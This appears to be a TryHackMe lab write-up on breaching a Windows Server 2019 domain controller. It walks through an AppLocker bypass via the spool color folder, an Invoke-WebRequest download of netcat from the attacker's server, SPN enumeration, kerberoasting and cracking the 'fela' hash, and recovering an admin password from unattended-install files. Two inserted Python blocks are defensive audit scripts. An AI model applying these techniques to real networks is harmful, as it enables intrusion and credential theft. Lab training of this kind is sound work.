TryHackMe Corp Writeup – Bypassing Windows Server 2019 Applocker and Kerberoasting
Hello and welcome back to my TryHackMe writeup. So, I have assigned myself a new task today: to compromise a Windows machine in the TryHackMe lab. The machine is called “Corp”, a Windows Server 2019 Datacenter Edition.
Basically, the machine is a subscriber-only machine. The best part of subscribing to THM is that in some challenges you get access to a real-life virtual machine, which you can either RDP into or access through your favorite web browser. However, I always prefer to RDP directly from my Windows laptop on such machines because of the stability.
The Real Task
The task is to bypass Windows AppLocker and escalate privileges. So, by the end of the exploit one will learn the basics of kerberoasting, evading antivirus detection, bypassing AppLocker and escalating privileges on a Windows server.
Let us start.
Let us run an nmap scan first:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 12:41 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating Ping Scan at 12:41
Scanning 220.127.116.11 [4 ports]
Completed Ping Scan at 12:41, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:41
Completed Parallel DNS resolution of 1 host. at 12:41, 5.52s elapsed
Initiating SYN Stealth Scan at 12:41
Scanning ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (18.104.22.168) [1000 ports]
Discovered open port 2000/tcp on 22.214.171.124
Discovered open port 139/tcp on 126.96.36.199
Discovered open port 135/tcp on 188.8.131.52
Discovered open port 53/tcp on 184.108.40.206
Discovered open port 3389/tcp on 220.127.116.11
Discovered open port 445/tcp on 18.104.22.168
Discovered open port 636/tcp on 22.214.171.124
Discovered open port 3268/tcp on 126.96.36.199
Discovered open port 593/tcp on 188.8.131.52
Discovered open port 5060/tcp on 184.108.40.206
Discovered open port 3269/tcp on 220.127.116.11
Discovered open port 464/tcp on 18.104.22.168
Discovered open port 389/tcp on 22.214.171.124
Completed SYN Stealth Scan at 12:42, 36.12s elapsed (1000 total ports)
Initiating Service scan at 12:42
Scanning 13 services on ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (126.96.36.199)
Completed Service scan at 12:44, 161.31s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (188.8.131.52)
Retrying OS detection (try #2) against ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (184.108.40.206)
Initiating Traceroute at 12:44
Completed Traceroute at 12:44, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:44
Completed Parallel DNS resolution of 2 hosts. at 12:44, 0.13s elapsed
NSE: Script scanning 220.127.116.11.
Initiating NSE at 12:44
Completed NSE at 12:45, 44.70s elapsed
Initiating NSE at 12:45
Completed NSE at 12:47, 121.02s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Nmap scan report for ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (18.104.22.168)
Host is up (0.024s latency).
Not shown: 986 filtered ports
PORT     STATE  SERVICE       VERSION
53/tcp   open   domain?
113/tcp  closed ident
135/tcp  open   msrpc         Microsoft Windows RPC
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
445/tcp  open   microsoft-ds?
464/tcp  open   kpasswd5?
593/tcp  open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open   tcpwrapped
2000/tcp open   cisco-sccp?
3268/tcp open   ldap          Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
3269/tcp open   tcpwrapped
3389/tcp open   ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: OMEGA
|   DNS_Domain_Name: corp.local
|   DNS_Computer_Name: omega.corp.local
|   DNS_Tree_Name: corp.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-05-14T09:44:49+00:00
| ssl-cert: Subject: commonName=omega.corp.local
| Issuer: commonName=omega.corp.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-13T08:30:43
| Not valid after: 2020-11-12T08:30:43
| MD5: d5c2 a37d 4171 365c 17af 2d4c a108 3285
|_SHA-1: fa74 2b64 e46e f599 ac78 63da bc40 d054 669c 2b9b
|_ssl-date: 2020-05-14T09:45:33+00:00; 0s from scanner time.
5060/tcp open   sip?
Device type: bridge|general purpose
Running (JUST GUESSING): Oracle Virtualbox (97%), QEMU (94%)
OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
Aggressive OS guesses: Oracle Virtualbox (97%), QEMU user mode network gateway (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=20 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: OMEGA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-14T09:44:51
|_  start_date: N/A
TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   1.43 ms 10.0.2.2
2   1.66 ms ec2-52-17-118-122.eu-west-1.compute.amazonaws.com (22.214.171.124)
NSE: Script Post-scanning.
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 377.06 seconds
Raw packets sent: 3044 (136.980KB) | Rcvd: 258 (12.231KB)
OK, a good number of ports are open. I will consider the rest of the ports later and try to RDP into the machine first. I used my Windows RDP client to connect and test, and then used XFreeRDP in my Kali for easy access to the file share.
[Task 2] Bypassing Applocker
AppLocker is an application whitelisting technology introduced with Windows 7. It restricts which programs users can execute based on the application’s path, publisher and file hash.
How To Bypass AppLocker
There are many ways to bypass AppLocker. If AppLocker is configured with the default AppLocker rules, we can bypass it by placing an executable in a directory that those rules allow and that a standard user can write to. C:\Windows\System32\spool\drivers\color is the one most often abused, because it is whitelisted by default.
The other ways are discussed here:
There is also a GitHub repo called “Ultimate AppLocker ByPass List” that lists the different possible bypass techniques.
But in this challenge I’m going to use the location C:\Windows\System32\spool\drivers\color, where I move my netcat.exe and run programs from, because anything run from that location is ignored or passed through.
I hosted a Python SimpleHTTPServer and manually copied nc.exe to the path, but I was blocked by Internet Explorer security settings.
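From the defender's side, the same weakness can be checked for before anyone abuses it. The following is an added example, not part of the original write-up: it evaluates a constructed AppLocker policy in the XML layout that Get-AppLockerPolicy -Xml exports and reports folders that are both user-writable and allowed by a path rule, first with the default rule alone and then with an exception for the folder discussed above. The rule Id, the variable expansion and the probe file name are assumptions made for the example.

```python
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

# AppLocker path variables, expanded for a default install (assumption).
VARS = {"%WINDIR%": r"C:\Windows", "%SYSTEM32%": r"C:\Windows\System32",
        "%PROGRAMFILES%": r"C:\Program Files"}

def policy(exceptions=""):
    """Constructed sample policy: the default Windows-folder Exe rule."""
    return ('<AppLockerPolicy Version="1"><RuleCollection Type="Exe" '
            'EnforcementMode="Enabled"><FilePathRule Id="constructed-1" '
            'Name="(Default Rule) All files located in the Windows folder" '
            'UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions>'
            r'<FilePathCondition Path="%WINDIR%\*"/></Conditions>'
            + exceptions + '</FilePathRule></RuleCollection></AppLockerPolicy>')

DEFAULT_POLICY = policy()
HARDENED_POLICY = policy(r'<Exceptions><FilePathCondition '
                         r'Path="%SYSTEM32%\spool\drivers\color\*"/></Exceptions>')

def _matches(pattern, path):
    for var, value in VARS.items():
        pattern = pattern.replace(var, value)
    return fnmatchcase(path.lower(), pattern.lower())

def allowing_rule(policy_xml, exe_path):
    """Name of the Exe path rule that allows exe_path, or None if blocked."""
    allowed_by = None
    rules = ET.fromstring(policy_xml).iterfind("RuleCollection[@Type='Exe']/FilePathRule")
    for rule in rules:
        conds = [c.get("Path") for c in rule.iterfind("Conditions/FilePathCondition")]
        excs = [c.get("Path") for c in rule.iterfind("Exceptions/FilePathCondition")]
        hit = (any(_matches(p, exe_path) for p in conds)
               and not any(_matches(p, exe_path) for p in excs))
        if hit and rule.get("Action") == "Deny":
            return None  # a matching deny rule overrides any allow rule
        if hit:
            allowed_by = allowed_by or rule.get("Name")
    return allowed_by

def writable_but_allowed(policy_xml, writable_dirs):
    """Folders a standard user can write to that the policy still lets run code."""
    return [d for d in writable_dirs if allowing_rule(policy_xml, d + r"\probe.exe")]

# Both folders appear in this write-up; a real audit would derive the list from ACLs.
WRITABLE = [r"C:\Windows\System32\spool\drivers\color", r"C:\Users\dark\Desktop"]

if __name__ == "__main__":
    for label, pol in (("default", DEFAULT_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, writable_but_allowed(pol, WRITABLE))
```

An empty list for the hardened policy means no folder in the audit list is both writable and permitted to run executables.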
Using PowerShell to import exe
I used PowerShell's Invoke-WebRequest to import the file from my local Python HTTP server:
Invoke-WebRequest http://10.11.xxx.xxx:8888/nc.exe -OutFile C:\Users\dark\Desktop\nc.exe
So, to make sure my netcat runs, I simply ran it and called the help, and it is confirmed working.
Task 2-1 is done.
Task 2-2 – Obtaining The Flag from the ConsoleHost_history
Like other OS consoles, PowerShell stores its console history in a file, called ConsoleHost_history.txt, at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt. I need to obtain the first flag from that location.
And here is the flag:
[Task 3] Kerberoasting
Task 3 is Kerberoasting. I’m supposed to use a PowerShell script to request a service ticket for an account and acquire the ticket hash. Then, I will need to crack the hash and get access to another user account!
First, I will need to find all accounts that have a Service Principal Name (SPN). For this I will use the PowerShell command:
setspn -T medin -Q */*
The script will run for a couple of seconds and return the SPN accounts on the server.
PS C:\Windows\System32\spool\drivers\color> setspn -T medin -Q */*
Ldap Error(0x51 -- Server Down): ldap_connect
Failed to retrieve DN for domain "medin" : 0x00000051
Warning: No valid targets specified, reverting to current domain.
CN=OMEGA,OU=Domain Controllers,DC=corp,DC=local
    Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/omega.corp.local
    ldap/omega.corp.local/ForestDnsZones.corp.local
    ldap/omega.corp.local/DomainDnsZones.corp.local
    TERMSRV/OMEGA
    TERMSRV/omega.corp.local
    DNS/omega.corp.local
    GC/omega.corp.local/corp.local
    RestrictedKrbHost/omega.corp.local
    RestrictedKrbHost/OMEGA
    RPC/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local
    HOST/OMEGA/CORP
    HOST/omega.corp.local/CORP
    HOST/OMEGA
    HOST/omega.corp.local
    HOST/omega.corp.local/corp.local
    E3514235-4B06-11D1-AB04-00C04FC2DCD2/7c4e4bec-1a37-4379-955f-a0475cd78a5d/corp.local
    ldap/OMEGA/CORP
    ldap/7c4e4bec-1a37-4379-955f-a0475cd78a5d._msdcs.corp.local
    ldap/omega.corp.local/CORP
    ldap/OMEGA
    ldap/omega.corp.local
    ldap/omega.corp.local/corp.local
CN=krbtgt,CN=Users,DC=corp,DC=local
    kadmin/changepw
CN=fela,CN=Users,DC=corp,DC=local
    HTTP/fela
    HOSTemail@example.com
    HTTPfirstname.lastname@example.org
Existing SPN found!
PS C:\Windows\System32\spool\drivers\color>
I found an existing Service Account for the user called “fela”.
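The same listing doubles as an audit input: any ordinary user account that carries an SPN has tickets whose strength depends on that account's password, so those accounts are the ones to give long random passwords or move to managed service accounts. The following is an added example, not part of the original write-up: it parses setspn -Q */* output and returns the user accounts with SPNs. The sample text is constructed from lines in the output above, and the rule for telling computer accounts from users by their container is a heuristic assumed for the example.

```python
# Constructed sample in the shape of the setspn -Q */* output shown above:
# an account DN on its own line, that account's SPNs indented beneath it.
SAMPLE = (
    "Warning: No valid targets specified, reverting to current domain.\n"
    "CN=OMEGA,OU=Domain Controllers,DC=corp,DC=local\n"
    "\tTERMSRV/omega.corp.local\n"
    "\tHOST/omega.corp.local\n"
    "CN=krbtgt,CN=Users,DC=corp,DC=local\n"
    "\tkadmin/changepw\n"
    "CN=fela,CN=Users,DC=corp,DC=local\n"
    "\tHTTP/fela\n"
    "\n"
    "Existing SPN found!\n"
)

# Containers that normally hold computer accounts (heuristic, assumption).
COMPUTER_CONTAINERS = {"OU=DOMAIN CONTROLLERS", "CN=COMPUTERS"}


def parse_setspn(output):
    """Map each account DN to the list of SPNs registered on it."""
    accounts, current = {}, None
    for line in output.splitlines():
        text = line.strip()
        if text.upper().startswith("CN="):
            current = accounts.setdefault(text, [])
        elif current is not None and line[:1] in (" ", "\t") and "/" in text:
            current.append(text)  # indented line with a slash: an SPN
    return accounts


def user_service_accounts(accounts):
    """User accounts that carry at least one SPN, keyed by account name."""
    flagged = {}
    for dn, spns in accounts.items():
        rdns = [part.strip() for part in dn.split(",")]
        name = rdns[0][3:]
        is_computer = any(r.upper() in COMPUTER_CONTAINERS for r in rdns[1:])
        # krbtgt is the built-in KDC account, not an ordinary service account
        if spns and not is_computer and name.lower() != "krbtgt":
            flagged[name] = spns
    return flagged


if __name__ == "__main__":
    for name, spns in user_service_accounts(parse_setspn(SAMPLE)).items():
        print(name, spns)
```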
Getting Hash From Service Principal Name Account
As we all know, Invoke-Kerberoast.ps1 is one of the commonly used PowerShell scripts to get the hash from an account that has an SPN. Since the target machine is already connected to the internet, I downloaded the script from the GitHub CDN.
Once downloaded, I ran the command Invoke-Command and output the hash in hashcat format so that it's easy for me to crack it.
Cracking The hash
I used John to crack the hash using a very simple command and rockyou as wordfile.
Once I had the password, I logged off the RDP session of the current user Dark and logged in as the new user Fela. Flag #2 was found on the desktop of the user Fela.
Privilege Escalation To Administrator
Now that I have the user Fela compromised, I will look for more and see if I can potentially escalate my privileges to Administrator. For this, I’m going to use PowerShellMafia’s PowerSploit. PowerUp looks for common Windows privilege escalation vectors that rely on misconfigurations. You will find more usage examples and a guide on the author’s blog.
First, I need to import the PowerShell script directly onto the server from the GitHub repo and run Invoke-AllChecks to see if I can find any vulnerabilities.
The script found a couple of vulns; let us run the Unattended Path exploit. Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode, and in this mode the Administrator password is stored in Base64-encoded format. Base64 is an encoding, not encryption, so anyone who can read the stored value can recover the password.
Logging As Administrator
I had an issue accessing the Administrator account: I wasn’t able to log in using XFreeRDP, which was giving a LoginFailure error. I tried a couple of times, then tried to log in from my Windows RDP client and noticed that the password was expired. Windows was prompting me to change the password, but for some reason I couldn’t change it.
Whatever the error, I should get the FLAG, so I logged back in, thinking to try the DLL exploit found in the PowerSploit enum. But I found a shortcut to read the flag from the Administrator’s desktop as the user Fela: C:/Users/Administrator/Desktop/flag.txt. I don’t know if it was allowed intentionally or was a case of wrong access rights.
[UPDATE] – I managed to talk to Paradox over Discord, and the way I owned the last flag was unintended; it was a small issue and has been fixed already, I believe.
Thank you for reading.